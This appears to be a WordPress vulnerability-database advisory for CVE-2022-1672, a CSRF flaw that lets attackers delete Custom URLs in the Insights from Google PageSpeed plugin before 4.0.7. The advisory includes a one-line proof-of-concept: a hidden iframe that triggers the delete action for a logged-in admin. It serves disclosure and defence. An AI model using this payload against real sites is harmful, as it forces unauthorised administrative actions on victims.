Insights from Google PageSpeed < 4.0.7 – Multiple CSRF | CVE 2022-1672 | Plugin Vulnerabilities

Description

The plugin does not verify for CSRF before doing various actions such as deleting Custom URLs, which could allow attackers to make a logged in admin perform such actions via CSRF attacks

Proof of Concept

<iframe src="https://example.com/wp-admin/tools.php?page=google-pagespeed-insights&render=custom-urls&action=delete&page_id=1" width="0" height="0" frameborder="0"></iframe>

Affects Plugins

google-pagespeed-insights

Fixed in 4.0.7

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

5c5955d7-24f0-45e6-9c27-78ef50446dad

Timeline

Publicly Published

2022-06-27 (about 3 years ago)

Added

2022-06-27 (about 3 years ago)

Last Updated

2023-04-02 (about 2 years ago)

Other

Published

Title

Published

2025-04-17

Title

Verge3D < 4.9.3 - Cross-Site Request Forgery

Published

2024-07-09

Title

WP Ajax Contact Form <= 2.2.2 - Arbitrary Email Deletion via CSRF

Published

2025-03-24

Title

Related Posts via Categories <= 2.1.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-02-03

Title

Theme Options Z <= 1.4 - Cross-Site Request Forgery

Published

2023-02-28

Title

Ever Compare < 1.2.4 - Arbitrary Plugin Activation via CSRF